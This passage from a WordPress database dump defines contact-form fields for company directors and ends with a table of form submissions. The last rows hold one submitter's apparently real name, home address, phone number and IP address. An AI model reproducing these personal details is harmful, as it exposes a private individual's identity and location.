Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\",\"checked\":false},{\"text\":\"\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\",\"checked\":false},{\"text\":\"\\t\\t\\t North\",\"checked\":false},{\"text\":\"\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\",\"identify\":\"physical_home_address_of_1st_director_67334520823_20_50\"}},{\"id\":\"8\",\"type\":\"name\",\"position\":\"left_4\",\"identify\":\"full_name_2nd_director_29773269723_18_53\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Full Name 3rd Director\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\",\"identify\":\"full_name_2nd_director_29773269723_18_53\"}},{\"id\":\"9\",\"type\":\"address\",\"position\":\"left_4\",\"identify\":\"physical_home_address_of_1st_director_30978551523_15_21\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Physical Home Address of 3rd Director\",\"instruction\":\"Please select country of citizenship if not South Africa\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\",\"checked\":false},{\"text\":\"\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\",\"checked\":false},{\"text\":\"\\t\\t\\t North\",\"checked\":false},{\"text\":\"\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\",\"identify\":\"physical_home_address_of_1st_director_30978551523_15_21\"}},{\"id\":\"11\",\"type\":\"file-upload\",\"position\":\"left_4\",\"identify\":\"file_upload_2246213119_14_29\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"File Upload\",\"instruction\":\"\",\"required\":0,\"allowedExtensions\":\"png,jpg,gif,zip,rar,txt,doc,pdf\",\"maxSize\":\"2\",\"maxSizeUnit\":\"MB\",\"identify\":\"file_upload_2246213119_14_29\",\"customClass\":\"\"}}]','','[[{\"columnName\":\"left_2\",\"columnClass\":\"span12\"}],[{\"columnName\":\"left_1\",\"columnClass\":\"span12\"}],[{\"columnName\":\"left_4\",\"columnClass\":\"span12\"}]]'),(2,'Page 1',141,'[{\"id\":12,\"type\":\"name\",\"position\":\"left\",\"identify\":\"name\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Name\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"format\":\"Extended\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"identify\":\"name\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\"}},{\"id\":13,\"type\":\"paragraph-text\",\"position\":\"left\",\"identify\":\"what_is_the_best_way_to_contact_you_\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"What is the best way to contact you?\",\"instruction\":\"\",\"required\":0,\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"what_is_the_best_way_to_contact_you_\"}},{\"id\":14,\"type\":\"email\",\"position\":\"left\",\"identify\":\"email\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Email\",\"instruction\":\"\",\"required\":\"1\",\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"email\"}},{\"id\":15,\"type\":\"website\",\"position\":\"left\",\"identify\":\"website\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Website\",\"instruction\":\"\",\"required\":0,\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"http:\\/\\/\",\"identify\":\"website\"}},{\"id\":16,\"type\":\"single-line-text\",\"position\":\"left\",\"identify\":\"message_subject\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Message Subject\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"limitType\":\"Words\",\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"message_subject\"}},{\"id\":17,\"type\":\"paragraph-text\",\"position\":\"left\",\"identify\":\"message\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Message\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"message\"}},{\"id\":18,\"type\":\"file-upload\",\"position\":\"left\",\"identify\":\"attached_file\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Attached File\",\"instruction\":\"\",\"required\":0,\"allowedExtensions\":\"png,jpg,gif,zip,rar,txt,doc,pdf\",\"maxSize\":512,\"maxSizeUnit\":\"KB\",\"identify\":\"attached_file\"}}]','','[[{\"columnName\":\"left\",\"columnClass\":\"span12\"}]]'),(3,'Page 1',175,'[{\"id\":19,\"type\":\"name\",\"position\":\"left\",\"identify\":\"name\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Name\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"format\":\"Extended\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"identify\":\"name\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\"}},{\"id\":20,\"type\":\"paragraph-text\",\"position\":\"left\",\"identify\":\"what_is_the_best_way_to_contact_you_\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"What is the best way to contact you?\",\"instruction\":\"\",\"required\":0,\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"what_is_the_best_way_to_contact_you_\"}},{\"id\":21,\"type\":\"email\",\"position\":\"left\",\"identify\":\"email\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Email\",\"instruction\":\"\",\"required\":\"1\",\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"email\"}},{\"id\":22,\"type\":\"website\",\"position\":\"left\",\"identify\":\"website\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Website\",\"instruction\":\"\",\"required\":0,\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"http:\\/\\/\",\"identify\":\"website\"}},{\"id\":23,\"type\":\"single-line-text\",\"position\":\"left\",\"identify\":\"message_subject\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Message Subject\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"limitType\":\"Words\",\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"message_subject\"}},{\"id\":24,\"type\":\"paragraph-text\",\"position\":\"left\",\"identify\":\"message\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Message\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"message\"}},{\"id\":25,\"type\":\"file-upload\",\"position\":\"left\",\"identify\":\"attached_file\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Attached File\",\"instruction\":\"\",\"required\":0,\"allowedExtensions\":\"png,jpg,gif,zip,rar,txt,doc,pdf\",\"maxSize\":512,\"maxSizeUnit\":\"KB\",\"identify\":\"attached_file\"}}]','','[[{\"columnName\":\"left\",\"columnClass\":\"span12\"}]]');
/*!40000 ALTER TABLE `wpxb_wr_contactform_form_pages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wr_contactform_submission_data`
--

DROP TABLE IF EXISTS `wpxb_wr_contactform_submission_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wr_contactform_submission_data` (
  `submission_data_id` int(11) NOT NULL AUTO_INCREMENT,
  `submission_id` int(11) NOT NULL,
  `form_id` int(11) NOT NULL,
  `field_id` int(11) NOT NULL,
  `field_type` varchar(45) COLLATE utf8mb4_unicode_ci NOT NULL,
  `submission_data_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`submission_data_id`),
  KEY `submission_data_id` (`submission_data_id`),
  KEY `submission_id` (`submission_id`),
  KEY `form_id` (`form_id`),
  KEY `field_id` (`field_id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wr_contactform_submission_data`
--

LOCK TABLES `wpxb_wr_contactform_submission_data` WRITE;
/*!40000 ALTER TABLE `wpxb_wr_contactform_submission_data` DISABLE KEYS */;
INSERT INTO `wpxb_wr_contactform_submission_data` VALUES (1,54,13,0,'os','Windows'),(2,54,13,0,'browser','Firefox'),(3,54,13,0,'ip','165.255.72.184'),(4,54,13,1,'choices','1'),(5,54,13,2,'paragraph-text','ADR\r\nDRF\r\nGTR\r\nDFY'),(6,54,13,10,'address','{&quot;street&quot;:&quot;112 Rose Avenue&quot;,&quot;line2&quot;:&quot;Lenasia&quot;,&quot;city&quot;:&quot;Johannesburg&quot;,&quot;state&quot;:&quot;Gauteng&quot;,&quot;code&quot;:&quot;2000&quot;,&quot;country&quot;:&quot;South Africa&quot;}'),(7,54,13,3,'name','{&quot;title&quot;:&quot;Mr&quot;,&quot;first&quot;:&quot;Imraan&quot;,&quot;suffix&quot;:&quot;&quot;,&quot;last&quot;:&quot;Wajoodeen&quot;}'),(8,54,13,4,'address','{&quot;street&quot;:&quot;112 Rose Avenue&quot;,&quot;line2&quot;:&quot;Lenasia&quot;,&quot;city&quot;:&quot;Johannesburg&quot;,&quot;state&quot;:&quot;Gauteng&quot;,&quot;code&quot;:&quot;1820&quot;,&quot;country&quot;:&quot;South Africa&quot;}'),(9,54,13,5,'phone','0820557080'),(10,54,13,6,'name','{&quot;title&quot;:&quot;Mr&quot;,&quot;first&quot;:&quot;&quot;,&quot;suffix&quot;:&quot;&quot;,&quot;last&quot;:&quot;&quot;}'),(11,54,13,7,'address','{&quot;street&quot;:&quot;&quot;,&quot;line2&quot;:&quot;&quot;,&quot;city&quot;:&quot;&quot;,&quot;state&quot;:&quot;&quot;,&quot;code&quot;:&quot;&quot;,&quot;country&quot;:&quot;South 